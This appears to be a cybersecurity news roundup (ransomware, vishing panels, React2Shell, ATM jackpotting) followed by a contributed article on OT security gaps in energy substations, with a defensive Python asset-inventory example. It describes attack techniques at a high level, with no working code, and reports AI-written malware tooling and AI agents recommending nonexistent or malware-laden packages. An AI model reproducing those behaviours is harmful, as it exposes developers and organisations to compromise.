Google has announced an expanded set of Android theft-protection features that build upon existing protections like Theft Detection Lock and Offline Device Lock introduced in 2024. The features are available for Android devices running Android 16+. Chief among them are granular controls to enable or disable Failed Authentication Lock, which automatically locks the device’s screen after excessive failed authentication attempts. Other notable updates include extending Identity Check to cover all features and apps that use the Android Biometric Prompt, stronger protections against attempts to guess PIN, pattern, or password by increasing the lockout time after failed attempts, and adding an optional security question to initiate a Remote Lock so as to ensure that it’s being done by the real device owner. “These protections are designed to make Android devices harder targets for criminals before, during, and after a theft attempt,” Google said.

AI-linked malware tooling spotted
New Malware Delivering PureRAT Shows Signs of AI

A PureRAT campaign has targeted job seekers using malicious ZIP archives either attached in emails or shared as links pointing to Dropbox that, when opened, leverage DLL side-loading to launch a batch script that’s responsible for executing the malware. In a new analysis, Broadcom’s Symantec and Carbon Black Threat Hunter Team said there are signs these tools, including the batch script, have been authored using artificial intelligence (AI). “Multiple tools used by the attacker bear hallmarks of having been developed using AI, such as detailed comments and numbered steps in scripts, and instructions to the attacker in debug messages,” it said. “Virtually every step in the batch file has a detailed comment in Vietnamese.” It’s suspected that the threat actor behind the activity is based in Vietnam and is likely selling access to compromised organizations to other actors.

UK–China cyber talks launched
U.K. and China Establish Cyber Dialogue

The U.K. and China have established a forum called Cyber Dialogue in which security officials from the two nations can discuss cyber attacks and manage threats to each other’s national security. The deal, according to Bloomberg, is a way to “improve communication, allow private discussion of deterrence measures and help prevent escalation.” The U.K. has previously called out Chinese threat actors for targeting its national infrastructure and government systems. As recently as this week, The Telegraph reported that Chinese nation-state threat actors have hacked the mobile phones of senior U.K. government members since 2021.

Poor OPSEC unmasks broker
Who is r1z?

Earlier this month, Jordanian national Feras Khalil Ahmad Albashiti pleaded guilty to charges of selling access to the networks of at least 50 companies through a cybercriminal forum. Albashiti, who also went by the online aliases r1z, secr1z, and j0rd4n14n, is said to have made 1,600 posts across multiple forums, including XSS, Nulled, Altenen, RaidForums, BlackHatWorld, and Exploit. On LinkedIn, Albashiti described himself as an information technology architect and consultant, claiming experience in cyber threats, cloud, network, web, and penetration testing. The kicker? His LinkedIn profile URL was “linkedin[.]com/in/r1z.” “The actor’s website, sec-r1z.com, was created in 2009, and based on WHOIS information, also reveals personal details of Firas, including the same Gmail address, alongside additional details like address and phone number,” KELA said. “The r1z case shows how initial access brokers monetize firewall exploits and enterprise access at scale, while the actor’s OPSEC failures leave long-term attribution trails that expose the ransomware supply chain.”

Encryption flaw traps victims
Flaw in Vibe-Coded Sicarii Ransomware

Cybersecurity company Halcyon said it identified a critical flaw in the encryption process of Sicarii, a newly discovered ransomware strain, that makes data recovery impossible even if an impacted organization pays a ransom. “During execution, the malware regenerates a new RSA key pair locally, uses the newly generated key material for encryption, and then discards the private key,” the company said. “This per-execution key generation means encryption is not tied to a recoverable master key, leaving victims without a viable decryption path and making attacker-provided decryptors ineffective for affected systems.” It’s assessed with moderate confidence that the threat actors used AI-assisted tooling that may have led to the implementation error.

Human-in-the-loop MFA bypass
Live Phishing Panels Used in New Attacks

Google-owned Mandiant said it’s tracking a fresh wave of voice-phishing attacks targeting single sign-on tools that are resulting in data theft and extortion attempts. Multiple threat actors are said to be combining voice calls and custom phishing kits, including a group identifying itself as ShinyHunters, to obtain unauthorized access and enroll threat actor-controlled devices into victim multi-factor authentication (MFA) for persistent access. Upon gaining access, the threat actors have been found to pivot to SaaS environments to exfiltrate sensitive data. It’s unclear how many organizations have been impacted by the campaign. In a similar alert, Silent Push said SSO providers are being targeted by a massive identity-theft campaign across more than 100 high-value enterprises. The activity leverages a new Live Phishing Panel that allows a human attacker to sit in the middle of a login session, intercept credentials, and gain persistent access. The hackers have set up fake domains targeting these companies, but it’s not known whether they have actually been targeted or whether their attempts to gain access to systems were successful. Some of the companies impacted include Crunchbase, SoundCloud, and Betterment, per Hudson Rock’s co-founder and CTO Alon Gal. “This isn’t a standard automated spray-and-pray attack; it is a human-led, high-interaction voice phishing (‘vishing’) operation designed to bypass even hardened Multi-Factor Authentication (MFA) setups,” Silent Push noted.

React flaw fuels crypto-mining attacks React2Shell Exploited to Target Russian Firms Threat actors have exploited the recently disclosed security flaw in React Server Components (CVE-2025-55182 aka React2Shell ) to infect Russian companies with XMRig-based cryptominers, per BI.ZONE. Other payloads deployed as part of the attacks include botnets such as Kaiji and Rustobot , as well as the Sliver implant. Russian companies in the housing, finance, urban infrastructure and municipal services, aerospace, consumer digital services, chemical industry, construction, and production sectors have also been targeted by a suspected pro-Ukrainian threat group called PhantomCore that employs phishing containing ZIP attachments to deliver a PowerShell malware that’s similar to PhantomRemote . Malware flood hits open source Sonatype Flagged 454K Malware Packages in 2025 Supply chain security company Sonatype said it logged 454,600 open-source malware packages in 2025, taking the total number of known and blocked malware to over 1.233 million packages across npm, PyPI, Maven Central, NuGet, and Hugging Face.

The threat is compounded by AI agents confidently recommending nonexistent versions or malware-infected packages, exposing developers to new risks like slop squatting. “The evolution of open source malware crystallized, evolving from spam and stunts into sustained, industrialized campaigns against the people and tooling that build software,” it said. “The next frontier of software supply chain attacks is not limited to package managers. AI model hubs and autonomous agents are converging with open source into a single, fluid software supply chain — a mesh of interdependent ecosystems without uniform security standards.”

Ransomware ecosystem doubles

Ransomware Attacks Climbed in 2025

A new analysis from Emsisoft revealed that ransomware groups had a massive year in 2025, claiming between 8,100 and 8,800 victims, significantly up from about 5,300 in 2023.

“As the number of victims has grown, so has the number of ransomware groups,” the company said. The number of active groups has surged from about 70 in 2023 to nearly 140 in 2025. Qilin, Akira, Cl0p, and Play emerged as some of the most active players in the landscape. “Law enforcement efforts are working—they are fragmenting major groups, forcing shutdowns, and creating instability at the top.

“Yet this disruption has not translated into fewer victims,” Emsisoft said. “Instead, ransomware has become more decentralized, more competitive, and more resilient. As long as affiliates remain plentiful and social engineering remains effective, victim counts are likely to continue rising.”

ATM malware ring charged

U.S. Ramps Up Actions Against ATM Jackpotting Attacks

The DoJ has announced charges against an additional 31 individuals accused of being involved in a massive ATM jackpotting scheme that resulted in the theft of millions of dollars.

The attacks involve the use of malware called Ploutus to hack into ATMs and force them to dispense cash. Between February 2024 and December 2025, the gang stole at least $5.4 million from at least 63 ATMs, most of which belonged to credit unions, the DoJ alleged. Many of the defendants charged in this Homeland Security Task Force operation are Venezuelan and Colombian nationals, including illegal alien Tren de Aragua (TdA) members, the DoJ said, adding 56 others have already been charged. “A large ring of criminal aliens allegedly engaged in a nationwide conspiracy to enrich themselves and the TdA terrorist organization by ripping off American citizens,” said Deputy Attorney General Todd Blanche.

“The Justice Department’s Joint Task Force Vulcan will not stop until it completely dismantles and destroys TdA and other foreign terrorists that import chaos to America.”

Blockchain-based C2 evasion

DeadLock Ransomware Uses Smart Contracts to Evade Detection

A ransomware strain called DeadLock, which was first detected in the wild in July 2025, has been observed using Polygon smart contracts for proxy server address rotation or distribution. While the exact initial access vectors used by the ransomware are not known, it drops an HTML file which acts as a wrapper for Session, an end-to-end encrypted and decentralized instant messenger. The HTML is used to facilitate direct communication between the DeadLock operator and the victim by sending and receiving messages from a server that acts as a middleware or proxy. “The most interesting part of this is how server addresses are retrieved and managed by DeadLock,” Group-IB noted, stating it “uncovered JS code within the HTML file that interacts with a smart contract over the Polygon network.” This list contains the available endpoints for interacting with the Polygon network or blockchain and obtaining the current proxy URL via the smart contract.

DeadLock also stands apart from traditional ransomware operations in that it lacks a data leak site to publicize the attacks. However, it uses AnyDesk as a remote management tool and leverages a previously unknown loader to exploit the Baidu Antivirus driver (“BdApiUtil.sys”) vulnerability (CVE-2024-51324) to conduct a bring your own vulnerable driver (BYOVD) attack and disable endpoint security solutions. According to Cisco Talos, it’s believed that the threat actor leverages the compromised valid accounts to gain access to the victim’s machine.

Crypto laundering networks scale up

Chinese Money Launderers Drive Illicit Crypto Economy

In a report published this week, Chainalysis said Chinese-language money laundering networks (CMLNs) are dominating known crypto money laundering activity, processing an estimated 20% of illicit cryptocurrency funds over the past five years.

“CMLNs processed $16.1 billion in 2025 – approximately $44 million per day across 1,799+ active wallets,” the blockchain intelligence firm said. “The illicit on-chain money laundering ecosystem has grown dramatically in recent years, increasing from $10 billion in 2020 to over $82 billion in 2025.” These networks launder funds using a variety of mechanisms, including gambling platforms, money movement, and peer-to-peer (P2P) services that process fund transfers without know your customer (KYC) checks. CMLNs have also processed an estimated 10% of funds stolen in pig butchering scams, an increase coinciding with the decline in the use of centralized exchanges. This is complemented by the emergence of guarantee marketplaces like HuiOne and Xinbi that function primarily as marketing venues and escrow infrastructure for CMLNs.

“CMLNs’ advertising on these guarantee services offer a range of money laundering techniques with the primary goal of integrating illicit funds into the legitimate financial system,” Chainalysis said.

SMS fraud hits Canadians

Fraud Campaigns Target Canada

Threat actors are impersonating government services and trusted national brands in Canada, often using lures related to traffic fines, tax refunds, airline bookings, and parcel delivery alerts in SMS messages and malicious ads, directing victims to phishing landing pages to enable account takeovers and direct financial fraud. “A significant portion of the activity is aligned with the ‘PayTool’ phishing ecosystem, a known fraud framework that specializes in traffic violation and fine payment scams targeting Canadians through SMS-based social engineering,” CloudSEK said.

Seen together, these stories show problems building slowly, not all at once.

The same gaps are being used again and again until they work. Most of this didn’t start this week. It’s growing, spreading, and getting easier for attackers to repeat. The full list helps show where things are heading before they become normal.


Survey of 100+ Energy Systems Reveals Critical OT Cybersecurity Gaps

A study by OMICRON has revealed widespread cybersecurity gaps in the operational technology (OT) networks of substations, power plants, and control centers worldwide. Drawing on data from more than 100 installations, the analysis highlights recurring technical, organizational, and functional issues that leave critical energy infrastructure vulnerable to cyber threats. The findings are based on several years of deploying OMICRON’s intrusion detection system (IDS) StationGuard in protection, automation, and control (PAC) systems. The technology, which monitors network traffic passively, has provided deep visibility into real-world OT environments.

The results underscore the growing attack surface in energy systems and the challenges operators face in securing aging infrastructure and complex network architectures.

Figure: Connection of an IDS in PAC systems (circles indicate mirror ports)

StationGuard deployments, often carried out during security assessments, revealed vulnerabilities such as unpatched devices, insecure external connections, weak network segmentation, and incomplete asset inventories. In many cases, these security weaknesses were identified within the first 30 minutes of connecting to the network. Beyond security risks, the assessments also uncovered operational issues like VLAN misconfigurations, time synchronization errors, and network redundancy problems.

In addition to technical shortcomings, the findings point to organizational factors that contribute to these risks — including unclear responsibilities for OT security, limited resources, and departmental silos. These findings reflect a growing trend across the energy sector: IT and OT environments are converging rapidly, yet security measures often fail to keep pace. How are utilities adapting to these complex risks, and what gaps remain that could leave critical systems exposed?

Why OT Networks Need Intrusion Detection

The ability to detect security incidents is an integral part of most security frameworks and guidelines, including the NIST Cybersecurity Framework, IEC 62443, and the ISO 27000 standard series.

In substations, power plant control systems, and control centers, many devices operate without standard operating systems, making it impossible to install endpoint detection software. In such environments, detection capabilities must be implemented at the network level. OMICRON’s StationGuard deployments typically use network mirror ports or Ethernet TAPs to passively monitor communication. Besides detecting intrusions and cyber threats, the IDS technology provides key benefits, including:
- Visualization of network communication
- Identification of unnecessary services and risky network connections
- Automatic asset inventory creation
- Detection of device vulnerabilities based on this inventory

Assessing Risks: Methodology Behind the Findings

The report is based on years of IDS installations.

The first installation dates back to 2018. Since then, several hundred installations and security assessments have been conducted at substations, power plants, and control centers in dozens of countries. The findings are grouped into three categories:
- Technical security risks
- Organizational security issues
- Operational and functional problems

In most cases, critical security and operational issues were detected within minutes of connecting the IDS to the network. Typically, sensors were connected to mirror ports on OT networks, often at gateways and other critical network entry points, to capture key communication flows.

In many substations, bay-level monitoring was not required, as multicast propagation made the traffic visible elsewhere in the network.

Hidden Devices and Asset Blind Spots

Accurate asset inventories are essential for securing complex energy systems. Creating and maintaining such directories manually is time-consuming and error-prone. To address this, OMICRON used both passive and active methods for automated asset discovery.

Passive asset identification relies on existing system configuration description (SCD) files, standardized under IEC 61850-6, which contain detailed device information. However, passive monitoring alone proved insufficient in many cases, as essential data such as firmware versions are not transmitted in normal PAC communication. Active querying of device information, on the other hand, leverages the MMS protocol to retrieve nameplate data such as device names, manufacturers, model numbers, firmware versions, and sometimes even hardware identifiers. This combination of passive and active techniques provided a comprehensive asset inventory across installations.
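As an added example that is not OMICRON's or StationGuard's code, the following Python builds the passive part of such an inventory from an SCD excerpt and then checks flow summaries from a mirror port against it, flagging devices the SCD does not document and sessions leaving the OT address range (two of the technical findings discussed further down). The SCD excerpt, IED names, addresses and flows are constructed for illustration; the firmware field is left empty because SCL does not carry it, which is exactly why the active MMS query is needed.

```python
# Added example, not OMICRON's or StationGuard's code: passive asset inventory from an
# IEC 61850-6 SCD file, then mirror-port flows checked against it. All data is constructed.
import ipaddress
import xml.etree.ElementTree as ET

NS = {"scl": "http://www.iec.ch/61850/2003/SCL"}

SCD_SAMPLE = """<SCL xmlns="http://www.iec.ch/61850/2003/SCL">
  <Communication><SubNetwork name="StationBus">
    <ConnectedAP iedName="PROT_E01" apName="P1"><Address>
      <P type="IP">10.10.1.11</P><P type="IP-SUBNET">255.255.255.0</P></Address></ConnectedAP>
    <ConnectedAP iedName="CTRL_E01" apName="P1"><Address>
      <P type="IP">10.10.1.12</P><P type="IP-SUBNET">255.255.255.0</P></Address></ConnectedAP>
  </SubNetwork></Communication>
  <IED name="PROT_E01" manufacturer="VendorA" type="RelayX" configVersion="2.1"/>
  <IED name="CTRL_E01" manufacturer="VendorB" type="BayCtrlY" configVersion="1.4"/>
</SCL>"""

# Constructed (src, dst) flow summaries as a passive sensor would report them.
FLOWS_SAMPLE = [("10.10.1.11", "10.10.1.12"),   # documented relay <-> bay controller
               ("10.10.1.77", "10.10.1.11"),   # address present in no SCD entry
               ("10.10.1.12", "203.0.113.5")]  # session leaving the OT address range

def inventory_from_scd(scd_xml):
    """Nameplate attributes and IPs the SCD declares per IED. SCL carries no firmware
    version, so that field stays None until an MMS nameplate query fills it in."""
    root = ET.fromstring(scd_xml)
    ieds = {}
    for ied in root.findall("scl:IED", NS):
        ieds[ied.get("name")] = {"manufacturer": ied.get("manufacturer"),
                                 "type": ied.get("type"),
                                 "configVersion": ied.get("configVersion"),
                                 "firmware": None, "ips": []}
    for ap in root.findall(".//scl:ConnectedAP", NS):
        ip = ap.find("scl:Address/scl:P[@type='IP']", NS)
        if ip is not None and ap.get("iedName") in ieds:
            ieds[ap.get("iedName")]["ips"].append(ip.text.strip())
    return ieds

def audit_flows(ieds, flows, ot_nets):
    """Flag devices inside the OT ranges that the SCD does not document, and endpoints
    outside those ranges (undocumented external links). Returns two sorted lists."""
    documented = {ip for d in ieds.values() for ip in d["ips"]}
    nets = [ipaddress.ip_network(n) for n in ot_nets]
    undocumented, external = set(), set()
    for src, dst in flows:
        for ip in (src, dst):
            if not any(ipaddress.ip_address(ip) in n for n in nets):
                external.add(ip)
            elif ip not in documented:
                undocumented.add(ip)
    return sorted(undocumented), sorted(external)
```

Calling `audit_flows(inventory_from_scd(SCD_SAMPLE), FLOWS_SAMPLE, ["10.10.1.0/24"])` reports 10.10.1.77 as an undocumented device and 203.0.113.5 as an external endpoint.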

Figure: Example of device information retrievable via SCL and MMS active querying

Which Technical Cybersecurity Risks Are Most Common?

OMICRON’s analysis identified several recurring technical issues across energy OT networks:
- Vulnerable PAC devices: Many PAC devices were found to be operating with outdated firmware containing known vulnerabilities. A notable example is the CVE-2015-5374 vulnerability, which allows a denial-of-service attack on protective relays with a single UDP packet. Although patches have been available since 2015, numerous devices remain unpatched. Similar vulnerabilities in GOOSE implementations and MMS protocol stacks pose additional risks.
- Risky external connections: In several installations, undocumented external TCP/IP connections were found, in some cases exceeding 50 persistent connections to external IP addresses in a single substation.
- Unnecessary insecure services: Common findings included unused Windows file sharing services (NetBIOS), IPv6 services, license management services running with elevated privileges, and unsecured PLC debugging functions.
- Weak network segmentation: Many facilities operated as a single large flat network, allowing unrestricted communication between hundreds of devices. In some cases, even office IT networks were reachable from remote substations. Such architectures significantly increase the impact radius of cyber incidents.
- Unexpected devices: Untracked IP cameras, printers, and even automation devices frequently appeared on networks without being documented in asset inventories, creating serious blind spots for defenders.

The Human Factor: Organizational Weaknesses in OT Security

Beyond technical flaws, OMICRON also observed recurring organizational challenges that exacerbate cyber risk.

These include:
- Departmental boundaries between IT and OT teams
- Lack of dedicated OT security personnel
- Resource constraints limiting the implementation of security controls

In many organizations, IT departments remain responsible for OT security — a model that often struggles to address the unique requirements of energy infrastructure.

When Operations Fail: Functional Risks in Substations

The IDS deployments also revealed a range of operational problems unrelated to direct cyber threats but still affecting system reliability. The most common were:
- VLAN issues were by far the most frequent, often involving inconsistent VLAN tagging of GOOSE messages across the network.
- RTU and SCD mismatches led to broken communication between devices, preventing SCADA updates in several cases.
- Time synchronization errors ranged from simple misconfigurations to devices operating with incorrect time zones or default timestamps.
- Network redundancy issues involving RSTP loops and misconfigured switch chips caused severe performance degradation in some installations.

These operational weaknesses not only impact availability but can also amplify the consequences of cyber incidents.

Figure: Functional monitoring related alert messages

What Can Utilities Learn from These Findings?

The analysis of over 100 energy facilities highlights the urgent need for robust, purpose-built security solutions that are designed for the unique challenges of operational technology environments. With its deep protocol understanding and asset visibility, the StationGuard Solution provides security teams with the transparency and control needed to protect critical infrastructure. Its built-in allowlisting detects even subtle deviations from expected behavior, while its signature-based detection identifies known threats in real time. The system’s ability to monitor both IT and OT protocols — including IEC 104, MMS, GOOSE, and more — allows utilities to detect and respond to threats at every layer of their substation network.

Combined with features like automated asset inventories, role-based access control, and seamless integration into existing security workflows, StationGuard enables organizations to strengthen resilience without disrupting operations. To learn more about how StationGuard supports utilities in closing these critical security gaps, visit our website. This article is a contributed piece from one of our valued partners.
